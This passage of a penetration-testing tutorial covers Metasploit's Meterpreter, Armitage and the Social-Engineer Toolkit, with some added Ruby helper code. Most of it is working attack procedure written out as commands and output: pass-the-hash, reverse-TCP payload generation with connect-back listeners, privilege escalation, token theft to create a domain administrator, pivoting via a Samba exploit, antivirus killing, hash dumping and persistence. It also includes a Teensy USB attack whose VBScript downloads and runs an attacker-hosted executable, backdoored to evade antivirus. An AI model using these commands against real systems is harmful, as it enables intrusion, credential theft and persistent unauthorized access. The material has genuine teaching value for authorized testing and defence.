With this module, we authenticate with the hash alone; no password is required. This lets us hop from one system to another in the victim's network, because it is very common for multiple systems to share the same local administrator account and password.
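As an added example (not code from the tutorial or from Metasploit), the Ruby below takes hashdump output from several hosts, separates the accounts that are actually usable for pass-the-hash from those with an empty password, prints the SMBPass value psexec expects for each, and flags NT hashes that appear under the same account on more than one host, which is exactly the shared-local-administrator situation the paragraph above relies on. The dumps in SAMPLE_DUMPS are constructed and the non-empty hashes are made up; the two well-known constants for the empty LM and empty NT hash are real.

```ruby
# Added example (not from the tutorial): read hashdump output, pick the
# accounts usable for pass-the-hash and spot the same local Administrator
# hash on several hosts. All dumps below are constructed; apart from the two
# empty-password constants, the hashes are made up.
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee' # LM field when no LM hash is stored
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0' # NT hash of the empty password

Account = Struct.new(:user, :rid, :lm, :nt) do
  def empty_password?; nt == EMPTY_NT; end
  def lm_present?;     lm != EMPTY_LM; end   # LM hash stored: weak, crackable offline
  def smbpass;         "#{lm}:#{nt}";  end   # value psexec expects in SMBPass
end

# Parse "user:rid:lmhash:nthash:::" lines as printed by hashdump; anything
# that is not exactly that shape (banners, blank lines) is skipped.
def parse_hashdump(text)
  text.each_line.filter_map do |line|
    user, rid, lm, nt = line.chomp.split(':')
    next unless rid.to_s =~ /\A\d+\z/ && [lm, nt].all? { |h| h.to_s =~ /\A\h{32}\z/ }
    Account.new(user, rid.to_i, lm.downcase, nt.downcase)
  end
end

# Accounts worth trying with psexec: ones with a real (non-empty) password.
def pth_candidates(accounts)
  accounts.reject(&:empty_password?)
end

# Given {host => hashdump text}, return {nt_hash => [[host, user], ...]} for
# hashes seen on more than one host; the same local admin hash everywhere is
# the classic lateral-movement path.
def reuse_across(dumps)
  seen = Hash.new { |h, k| h[k] = [] }
  dumps.each do |host, text|
    pth_candidates(parse_hashdump(text)).each { |a| seen[a.nt] << [host, a.user] }
  end
  seen.select { |_nt, where| where.map(&:first).uniq.size > 1 }
end

SAMPLE_DUMPS = {
  '192.168.1.3' => <<~DUMP,
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    eleanor:1005:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
  DUMP
  '192.168.1.4' => <<~DUMP,
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    svc_backup:1010:aabbccddaabbccddaabbccddaabbccdd:ffeeddccffeeddccffeeddccffeeddcc:::
  DUMP
}.freeze

if __FILE__ == $0
  reuse_across(SAMPLE_DUMPS).each do |nt, where|
    puts "NT hash #{nt} reused by: #{where.map { |h, u| "#{u}@#{h}" }.join(', ')}"
  end
  parse_hashdump(SAMPLE_DUMPS['192.168.1.3']).each do |a|
    flags = []
    flags << 'empty password' if a.empty_password?
    flags << 'LM hash present' if a.lm_present?
    puts "#{a.user}: SMBPass=#{a.smbpass}#{" (#{flags.join(', ')})" unless flags.empty?}"
  end
end
```

The reuse check is the defender's view of the same fact: if the local Administrator NT hash is identical on every workstation, one hashdump compromises all of them, which is why unique per-host local administrator passwords (or disabling the account) matter.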

4.3.3 Privilege Escalation


When we have access to the system, we can create a normal user account with limited permissions using the net user command:

    > net user eleanor pass /add

The normal user account prevents us from executing commands that require administrative permissions. By elevating the account's permissions we overcome that restriction. To demonstrate, we create a Meterpreter-based payload, payload.exe, copy it to the target XP machine and run it under the new limited user account eleanor. First let's create a payload.exe that connects back to 192.168.1.2:443.

    # msfpayload4.0 windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 X > payload.exe

(The binaries are called msfpayload4.0 and msfcli4.0 here, presumably the versioned names on the author's install; on most systems they are simply msfpayload and msfcli.)

Use the msfcli interface to start a multi/handler listener, which waits for connections and spawns a Meterpreter shell when one is received:

    # msfcli4.0 multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 E

We copy payload.exe to the victim machine and execute it under the user eleanor. The payload connects back to the attacker machine and spawns a Meterpreter shell. In that shell we run getuid to verify that we are indeed running as eleanor:

    meterpreter > getuid

Next, we can drop into a shell and run net user eleanor to see the groups the user eleanor belongs to:

    meterpreter > shell
    C:\> net user eleanor
    Local Group Memberships      *Users
    Global Group Memberships     *None
    C:\> ^Z
    Background channel 1? [y/N] y

To get administrative rights, we first run use priv to load the priv extension, which gives us access to the privileged commands. Next we enter getsystem, which tries several techniques in turn to elevate our privileges to those of the local SYSTEM account. We then verify with getuid; a server username of NT AUTHORITY\SYSTEM tells us we have succeeded. Keep in mind that getsystem's techniques generally need the session to hold local administrator rights already; from a plain user on a patched system it fails and a local privilege-escalation exploit is required first.

    meterpreter > use priv
    meterpreter > getsystem
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM

To switch back to the previous user account where we initially got our meterpreter shell, wed use rev2self.

4.3.4 Token Impersonation


With token impersonation, we grab a Windows access token (the logon token of a user on the target machine) and use it in place of authenticating ourselves. First we list the running processes and find out which account each runs under. In the following example the domain is SNEAKS.IN and the account adminuser is in use:

    meterpreter > ps
    Process list
    ============
    380   cmd.exe      x86   0   SNEAKS.IN\adminuser   \System\Root\System32\cmd.exe
    meterpreter >

Now we use steal_token to take the token from a process that holds it:

    meterpreter > steal_token 380
    Stolen token with username: SNEAKS.IN\adminuser

Meterpreter is now running in the context of the adminuser account. Now we can load incognito to list the tokens available on the system:

    meterpreter > use incognito
    Loading extension incognito...success.
    meterpreter > list_tokens -u
    [-] Warning: Not currently running as SYSTEM, not all tokens will be available
    Call rev2self if primary process token is SYSTEM
    Delegation Tokens Available
    ========================================
    SNEAKS.IN\adminuser
    ADMINUSER\Administrator
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM
    Impersonation Tokens Available
    ========================================
    NT AUTHORITY\ANONYMOUS LOGON

We can impersonate the adminuser token and add another user account, which we then make a domain administrator:

    meterpreter > impersonate_token SNEAKS.IN\\adminuser
    [+] Delegation token available
    [+] Successfully impersonated user SNEAKS.IN\adminuser
    meterpreter > add_user omgcompromised p@55w0rd! -h 192.168.33.50
    [*] Attempting to add user omgcompromised to host 192.168.33.50
    [+] Successfully added user
    meterpreter > add_group_user "Domain Admins" omgcompromised -h 192.168.33.50
    [*] Attempting to add user omgcompromised to group Domain Admins on domain controller 192.168.33.50
    [+] Successfully added user to group

When entering the add_user and add_group_user commands, be sure to specify the -h flag, which tells Incognito where to add the domain administrator account; in this case that is the IP address of a domain controller. The implications of this attack are devastating: the delegation token left behind on any system that a domain administrator logs into can be assumed and used to access the entire domain. This means that every server on your network is only as secure as your weakest link.

4.3.5 Pivoting onto Other Systems


Pivoting can be used to attack other systems on a network through an already compromised machine, much like tunneling. With pivoting we gain access to systems to which we could not otherwise route traffic, for whatever reason. First, we must assume that we've already compromised a server in the network and have meterpreter access to the compromised machine. We begin by displaying the local subnets of the compromised system from within the meterpreter session with the run get_local_subnets command. Next, we background our running session and add a route to the framework, telling it to route the remote network ID over session 1, the backgrounded meterpreter session. We then display the active routes with route print and can see that our route is active:

    meterpreter > run get_local_subnets
    Local subnet: 192.168.33.0/255.255.255.0
    meterpreter > background
    msf exploit(handler) > route add 192.168.33.0 255.255.255.0 1
    msf exploit(handler) > route print

    Active Routing Table
    ====================

       Subnet          Netmask          Gateway
       ------          -------          -------
       192.168.33.0    255.255.255.0    Session 1

Next, we must set up a second exploit against another system in the network:

    msf > use linux/samba/lsa_transnames_heap
    msf exploit(lsa_transnames_heap) > set payload linux/x86/shell/reverse_tcp
    msf exploit(lsa_transnames_heap) > set LHOST 10.10.1.176
    msf exploit(lsa_transnames_heap) > set LPORT 8080
    msf exploit(lsa_transnames_heap) > set RHOST 192.168.33.132
    msf exploit(lsa_transnames_heap) > ifconfig
    [*] exec: ifconfig

    lo        Link encap:Local Loopback
              inet addr:127.0.0.1  Mask:255.0.0.0
              inet6 addr: ::1/128 Scope:Host
              UP LOOPBACK RUNNING  MTU:16436  Metric:1
              RX packets:564 errors:0 dropped:0 overruns:0 frame:0
              TX packets:564 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:71094 (69.4 KiB)  TX bytes:71094 (69.4 KiB)

    wlan0     Link encap:Ethernet  HWaddr 00:26:c6:21:cf:1a
              inet addr:10.1.1.176  Bcast:10.1.1.255  Mask:255.255.255.0
              inet6 addr: fe80::226:c6ff:fe21:cf1a/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:3490949 errors:0 dropped:0 overruns:0 frame:0
              TX packets:3025769 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:3318998012 (3.0 GiB)  TX bytes:867469870 (827.2 MiB)

    msf exploit(lsa_transnames_heap) > exploit

Our LHOST option specifies the IP address of our attacking machine, and RHOST is set to an address in a different network subnet. What we're doing is tunneling traffic through the first compromised machine and attacking the second. If the heap overflow is successful, we should be presented with a reverse shell from 192.168.33.132. We can also use the load auto_add_route command to automatically add routes for the networks of each new meterpreter session as it is spawned:

    msf  exploit(lsa_transnames_heap) > load auto_add_route
    [*] Successfully loaded plugin: auto_add_route
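As an added illustration of how the routing table above is used (example code written for this edit, not Metasploit's own implementation), the small model below parses the get_local_subnets line, records routes the way route add does, prints them in the shape of route print, and resolves which session a destination address would be tunnelled through, using longest-prefix matching. The class name PivotRouteTable and its methods are assumptions of this example. From the defender's side it also makes concrete why the subnets reachable from any single host bound how far a compromise of that host can be extended.

```ruby
require 'ipaddr'

# Added example (not Metasploit's own code): a minimal model of the
# framework's routing table as shown by `route add` / `route print`.
# Each route maps a subnet+netmask to the session that traffic for that
# subnet is tunnelled through; anything unmatched goes out directly.
class PivotRouteTable
  Route = Struct.new(:subnet, :netmask, :session) do
    # Prefix length derived from the dotted netmask, e.g. 255.255.255.0 -> 24
    def prefix
      IPAddr.new(netmask).to_i.to_s(2).count('1')
    end

    def network
      IPAddr.new("#{subnet}/#{prefix}")
    end
  end

  def initialize
    @routes = []
  end

  # Mirrors `route add <subnet> <netmask> <session id>`
  def add(subnet, netmask, session)
    @routes << Route.new(subnet, netmask, Integer(session))
    self
  end

  # Parses the "Local subnet: 192.168.33.0/255.255.255.0" line printed by
  # get_local_subnets and adds it for the given session (the job the
  # auto_add_route plugin automates).
  def add_from_local_subnet(line, session)
    m = line.match(%r{Local subnet:\s*(\S+)/(\S+)})
    raise ArgumentError, "unrecognised line: #{line.inspect}" unless m
    add(m[1], m[2], session)
  end

  # Returns the session id that would carry traffic to +ip+, or nil for a
  # direct (non-pivoted) connection. The longest matching prefix wins, so a
  # more specific route over a different session takes precedence.
  def lookup(ip)
    addr = IPAddr.new(ip)
    best = @routes.select { |r| r.network.include?(addr) }.max_by(&:prefix)
    best && best.session
  end

  # Renders the table in the same shape as `route print`.
  def print_table
    row = ->(a, b, c) { format("   %-16s%-17s%s", a, b, c) }
    lines = ["Active Routing Table", "=" * 20, "",
             row.call("Subnet", "Netmask", "Gateway"),
             row.call("------", "-------", "-------")]
    @routes.each { |r| lines << row.call(r.subnet, r.netmask, "Session #{r.session}") }
    lines.join("\n")
  end
end

if $PROGRAM_NAME == __FILE__
  table = PivotRouteTable.new
  table.add_from_local_subnet("Local subnet: 192.168.33.0/255.255.255.0", 1)
  puts table.print_table
  puts table.lookup("192.168.33.132").inspect # 1: tunnelled over session 1
  puts table.lookup("10.1.1.176").inspect     # nil: reached directly
end
```

Only the matching logic is modelled here; the framework itself also has to proxy the actual TCP connections through the session, which this example does not attempt.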

4.3.6 Using Meterpreter Scripts


To run a script from the meterpreter console, issue the run script command.
4.3.6.1 VNC Desktop

If you want to use an interactive remote GUI on the system, you can use the VNC protocol to tunnel the active desktop communications and interact with the GUI desktop. First we install the VNC session on the remote target with run vnc, and then launch the run screen_unlock command to unlock the target machine so that we can view the desktop. As a result, a VNC window should appear, showing us the target desktop:

    meterpreter > run vnc
    meterpreter > run screen_unlock

4.3.6.2 Migrating a Process

Often, when attacking a system and exploiting a service such as Internet Explorer, if the target closes the browser, the meterpreter session is also closed and we lose our connection to the target. To avoid this problem, we can use the migrate module to move the session into a process that won't close when the target closes the browser. By migrating to a different, more stable process, we ensure that the process isn't closed and we maintain our connection to the system:

    meterpreter > run post/windows/manage/migrate

4.3.6.3 Killing Antivirus Software

Antivirus software can block certain tasks. In such cases we can run the killav script to stop the processes preventing our tasks from running:

    meterpreter > run killav

4.3.6.4 Obtaining System Password Hashes

We can obtain the password hashes by running the run hashdump command:

    meterpreter > run hashdump

4.3.6.5 Viewing all Traffic on a Target Machine

To see all traffic on a target, we can run a packet recorder. Everything captured by packetrecorder is saved in the .pcap file format, which can be viewed with Wireshark. The -i option specifies the interface on which to capture packets:

    meterpreter > run packetrecorder -i 1

4.3.6.6 Scraping the System

The scraper script enumerates just about everything you could ever want from a system. It will grab the usernames and passwords, download the entire registry, dump password hashes, gather system information, and export the HKEY_CURRENT_USER (HKCU) hive:

    meterpreter > run scraper

4.3.6.7 Using Persistence

The persistence script ensures that meterpreter is running even after the target system reboots. If this is a reverse connection, you can set the interval at which the target connects back to the attacker machine. If you use this functionality, be sure to remove it after you're done. If you forget to do this, any attacker can also gain access to the system without authentication. When we run persistence we tell Windows to autostart the agent at boot time (-X), wait 50 seconds (-i 50) between connection retries, use port 443 (-p 443), and connect back to IP 192.168.33.129 (-r 192.168.33.129):

    meterpreter > run persistence -X -i 50 -p 443 -r 192.168.33.129

Then we need to establish a listener for the agent with use multi/handler:

    msf > use multi/handler
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf exploit(handler) > set LPORT 443
    msf exploit(handler) > set LHOST 192.168.33.129
    msf exploit(handler) > exploit

    [*] Started reverse handler on 192.168.33.129:443
    [*] Starting the payload handler..

After this, the meterpreter agent will connect to our machine at 192.168.33.129:443.

4.3.6.8 Interacting with Windows API

We can natively call Windows APIs through the Metasploit add-on called railgun. First we need to use the irb command, which drops us into an interactive Ruby shell. This in turn allows us to call railgun and thus the Windows API:

    meterpreter > irb
    [*] Starting IRB shell
    [*] The 'client' variable holds the meterpreter client
    >> client.railgun.user32.MessageBoxA(0,"hello","world","MB_OK")

On the target machine, we should see a pop-up box with world in the titlebar and hello in the message box. In this example, we simply called the user32.dll and the MessageBoxA function. Remember that railgun gives us the same capabilities as a native Win32 application with full access to the windows API, so we can pretty much do anything we want.

4.4 Meterpreter Scripting

We can add arbitrary scripts to the meterpreter. There are already some scripts written, which can be found in the meterpreter repository http://dev.metasploit.com/redmine/projects/framework/repository/show/scripts/meterpreter. Existing scripts are meant to be used with a meterpreter shell after the successful compromise of a target. Some of the most interesting scripts are:

    checkvm - Check whether the exploited machine is a virtual machine.
    getcountermeasure - Check the security configuration on the victim system and enable/disable security measures such as A/V, firewall, etc.
    getgui - Enable RDP on a target system if it is disabled.
    gettelnet - Enable telnet on a target system if it is disabled.
    killav - Disable most antivirus programs running as a service on a target.
    get_local_subnets - Get the local subnet mask from a victim.
    hostsedit - Add entries to the Windows hosts file, which is checked before the DNS server. This helps us divert traffic to a fake entry.
    remotewinenum - Enumerate system information through wmic on the victim.
    winenum - Very detailed Windows enumeration tool.
    scraper - Get system information, including the entire registry.

5 Beyond Metasploit
5.1 Armitage
Armitage is a GUI front-end for the Metasploit framework. To install Armitage, download it and run it. Since Armitage communicates with Metasploit via the RPC daemon, we need to start that daemon first:

    # msfrpcd3.7 -f -U msf -P msf -t Basic

When we start Armitage, the following connection dialog shows up:
Armitage connection dialog.

We need to enable SSL and provide the user/password for the RPC daemon and the MySQL database. When the connection is established, Armitage shows us its main window:
Armitage main window.

To scan a target, we must first select a scanner; we've chosen smb_version. Then we just set the appropriate variables, such as RHOSTS.
Armitage selecting a target.

After clicking Launch, the detected hosts are presented on the screen. If there are any hosts we don't wish to target, we can remove them by right-clicking on a host, expanding the "Host" menu, and selecting "Remove Host". We need to remember that any data collected with Armitage is also stored in the MySQL database.

5.2 Social Engineering Toolkit - SET


SET is designed to perform advanced attacks against the human element. The attacks built into the toolkit are designed to be targeted against a person or organization during a penetration test. First you need to download SET:

    # svn co http://svn.secmaniac.com/social_engineering_toolkit set/

SET works out of the box, but provides many configuration options to change its behaviour. The config file is located under config/set_config. You should at least change METASPLOIT_PATH to point at your Metasploit installation. SET is a menu-driven attack system:

    # ./set

                    ######  ########  ########
                   ##    ## ##           ##
                   ##       ##           ##
                    ######  ######       ##
                         ## ##           ##
                   ##    ## ##           ##
                    ######  ########     ##

      [---]       The Social-Engineer Toolkit (SET)         [---]
      [---]        Created by: David Kennedy (ReL1K)         [---]
      [---]        Development Team: Thomas Werth             [---]
      [---]        Development Team: JR DePre (pr1me)         [---]
      [---]        Development Team: Joey Furr (j0fer)        [---]
      [---]                Version: 2.0.3                     [---]
      [---]           Codename: 'Trebuchet Edition'           [---]
      [---]        Report bugs to: davek@secmaniac.com        [---]
      [---]         Follow me on Twitter: dave_rel1k          [---]
      [---]        Homepage: http://www.secmaniac.com         [---]

       Welcome to the Social-Engineer Toolkit (SET). Your one
        stop shop for all of your social-engineering needs..

        DerbyCon 2011 Sep 30-Oct 02 - http://www.derbycon.com.

         Join us on irc.freenode.net in channel #setoolkit

     Select from the menu:

       1) Spear-Phishing Attack Vectors
       2) Website Attack Vectors
       3) Infectious Media Generator
       4) Create a Payload and Listener
       5) Mass Mailer Attack
       6) Arduino-Based Attack Vector
       7) SMS Spoofing Attack Vector
       8) Wireless Access Point Attack Vector
       9) Third Party Modules
      10) Update the Metasploit Framework
      11) Update the Social-Engineer Toolkit
      12) Help, Credits, and About

      99) Exit the Social-Engineer Toolkit

    set >

5.2.1 Spear-Phishing Attack Vector


This attack can be used to send targeted emails with malicious attachments. Note that when using SET, you can create and save your own templates to use for future attacks.

5.2.2 Teensy USB HID Attack Vector


Note that you have to have arduino and arduino teensy software installed before you can proceed with this attack.

Traditionally, when you insert a DVD/CD or USB drive with autorun disabled, your autorun.inf isn't called and you can't execute your code automatically. With the Teensy HID-based device you can emulate a keyboard and mouse. When you insert the device it is detected as a keyboard, and with the microprocessor and onboard flash memory storage you can send a very fast set of keystrokes to the machine and completely compromise it. Ok, let's create a wscript file, which will download an executable (the Metasploit payload) and execute it:

    set > 6 [Arduino-Based Attack Vector]
    set:arduino > 2 [WSCRIPT HTTP GET MSF Payload]
     Do you want to create a payload and listener [yes|no]: yes
    set:payloads > 1 [Windows Shell Reverse_TCP]
    set:encoding > 16  [Backdoored Executable (BEST)]
    set:payloads > PORT of the listener [443]:
    [-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
    [*] Backdoor completed successfully. Payload is now hidden within a legit executable.
    [*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
    [-] Packing the executable and obfuscating PE file randomly, one moment.
    [*] Digital Signature Stealing is ON, hijacking a legit digital certificate

    [*] PDE file created. You can get it under 'reports/teensy.pde'
    [*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino

    [*] If your running into issues with VMWare Fusion and the start menu, uncheck the 'Enable Key Mapping' under preferences in VMWare

    [*] Launching MSF Listener...
    [*] This may take a few to load MSF...
    [-] ***
    [-] * WARNING: Database support has been disabled
    [-] ***



           =[ metasploit v4.0.0-release [core:4.0 api:1.0]
    + -- --=[ 716 exploits - 361 auxiliary - 68 post
    + -- --=[ 226 payloads - 27 encoders - 8 nops
           =[ svn r13462 updated 32 days ago (2011.08.01)

    resource (src/program_junk/meta_config)> use exploit/multi/handler
    resource (src/program_junk/meta_config)> set PAYLOAD windows/shell_reverse_tcp
    resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
    resource (src/program_junk/meta_config)> set LPORT 443
    resource (src/program_junk/meta_config)> set ExitOnSession false
    resource (src/program_junk/meta_config)> exploit -j
    [*] Exploit running as background job.
    [*] Started reverse handler on 0.0.0.0:443
    [*] Starting the payload handler...

We can see that SET exported teensy.pde to the reports/ folder. Now that the file is ready, we need to upload it to the Arduino board. In the Arduino software package select Tools - Board - Teensy 2.0, and Tools - USB Type: Keyboard and Mouse (not Serial). Then drag the pde file into the Arduino interface and upload the code. Did you notice something odd: SET didn't ask us for an IP address. This is because AUTO_DETECT is set to on in the config file, which means the payload was automatically given the IP address of our ethernet interface. So we need to change that setting if we want to choose the IP address ourselves:

    AUTO_DETECT=OFF

Once the USB device is inserted into the victim machine the teensy.pde program is executed, which creates an omg.vbs script:

    strFileURL = "http://10.1.1.2/x.exe"
    strHDLocation = "x.exe"
    Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
    objXMLHTTP.open "GET", strFileURL, false
    If objXMLHTTP.Status = 200 Then
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1
    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0
    Set objFSO = Createobject("Scripting.FileSystemObject")
    If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    Set objFSO = Nothing
    objADOStream.SaveToFile strHDLocation
    objADOStream.Close
    Set objADOStream = Nothing
    End if
    Set objXMLHTTP = Nothing

Here we can see that the VBScript only downloads x.exe from the server, which in our case is 10.1.1.2:80. We need to make sure that Apache is running on the attacker host and that the x.exe file is present at http://10.1.1.2/x.exe (we need to copy it to the DocumentRoot from ./set/src/webattack/web_clone/site/template/x.exe). When x.exe is downloaded to the victim computer, it is executed and connects back to the attacker computer on port 443, so we need to be listening on that port as well. We can check that the right ports are open on the attacker:

    # netstat -lantp
    tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      17430/ruby
    tcp6       0      0 :::80                   :::*                    LISTEN      16670/apache2
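As an added example, independent of the page and of SET, here is a small static checker in Ruby for the download-to-disk pattern the omg.vbs script relies on: an MSXML2.XMLHTTP fetch, an ADODB.Stream opened in binary mode, and SaveToFile. This is the shape a host-based scanner or mail gateway rule would look for in dropped .vbs files. The INDICATORS table, analyse_vbscript and both sample scripts are constructions of this example; the dropper sample is the page's script trimmed to its detection-relevant lines, and the benign sample is made up.

```ruby
# Added example (not part of the page or of SET): flag VBScript that
# downloads a file to disk the way the omg.vbs dropper does.
# Each indicator is a case-insensitive regex; a script counts as a
# downloader only when every member of the core chain is present.
INDICATORS = {
  http_client:   /CreateObject\s*\(\s*"(MSXML2\.XMLHTTP|Microsoft\.XMLHTTP|WinHttp\.WinHttpRequest[\d.]*)"\s*\)/i,
  binary_stream: /CreateObject\s*\(\s*"ADODB\.Stream"\s*\)/i,
  stream_binary: /\.Type\s*=\s*1\b/i,          # ADODB.Stream adTypeBinary
  save_to_disk:  /\.SaveToFile\b/i,
  url_literal:   %r{"https?://[^"]+"}i,
  # Not present in the page's script; droppers that also launch the file
  # typically call WScript.Shell Run/Exec or ShellExecute afterwards.
  exec_after:    /\.(Run|Exec|ShellExecute)\s*\(?/i,
}.freeze

CORE_CHAIN = %i[http_client binary_stream save_to_disk].freeze

# Returns a hash describing the findings for one script body:
#   downloader: all three core indicators present
#   executes:   a launch call follows (escalates severity)
#   urls:       every quoted http(s) URL, for blocking / threat-intel lookup
#   indicators: the list of indicator names that matched
def analyse_vbscript(source)
  hits = INDICATORS.select { |_, re| source.match?(re) }.keys
  urls = source.scan(INDICATORS[:url_literal]).map { |u| u.delete('"') }
  {
    downloader: (CORE_CHAIN - hits).empty?,
    executes:   hits.include?(:exec_after),
    urls:       urls,
    indicators: hits,
  }
end

# Constructed sample: the page's omg.vbs downloader, trimmed to the lines
# that matter for detection.
DROPPER_SAMPLE = <<~'VBS'
  strFileURL = "http://10.1.1.2/x.exe"
  strHDLocation = "x.exe"
  Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
  objXMLHTTP.open "GET", strFileURL, false
  If objXMLHTTP.Status = 200 Then
  Set objADOStream = CreateObject("ADODB.Stream")
  objADOStream.Open
  objADOStream.Type = 1
  objADOStream.Write objXMLHTTP.ResponseBody
  objADOStream.SaveToFile strHDLocation
  objADOStream.Close
  End if
VBS

# Constructed benign sample: an admin script that only reads a local log.
BENIGN_SAMPLE = <<~'VBS'
  Set fso = CreateObject("Scripting.FileSystemObject")
  Set f = fso.OpenTextFile("C:\logs\backup.log", 1)
  WScript.Echo f.ReadAll
  f.Close
VBS

if $PROGRAM_NAME == __FILE__
  { "omg.vbs (constructed)" => DROPPER_SAMPLE,
    "backup check (constructed)" => BENIGN_SAMPLE }.each do |name, src|
    r = analyse_vbscript(src)
    verdict = r[:downloader] ? "DOWNLOADER" : "clean"
    puts "#{name}: #{verdict} indicators=#{r[:indicators].join(',')} urls=#{r[:urls].join(',')}"
  end
end
```

Requiring the whole chain rather than any single indicator keeps the rule from firing on ordinary scripts that merely use ADODB.Stream or XMLHTTP on their own; the URL list is what you would feed to a proxy blocklist or pivot on in logs.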

After x.exe is executed we should see something like this:

    [*] Command shell session 1 opened (10.1.1.2:443 -> 10.1.1.3:1402) at Fri Sep 02 16:40:18 +0200 2

    msf  exploit(handler) > sessions

    Active sessions
    ===============

      Id  Type           Information  Connection
      --  ----           -----------  ----------
      1   shell windows               10.1.1.2:443 -> 10.1.1.3:1402

    msf  exploit(handler) > sessions -i 1
    [*] Starting interaction with 1...

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\Documents and Settings\deki\Desktop>

And we've got a shell. But it would be wise to discuss the drawbacks of this method now. When the Teensy is plugged in, it displays all the commands, so they are visible to the user, and you're not allowed to click anything while the script is working, because it types its commands into the currently active window (which would no longer be cmd.exe if we had touched something). The x.exe is detected by the antivirus as a trojan horse, so it is immediately deleted and never executed. This results in an unsuccessful attack, since we can't get the victim's shell.
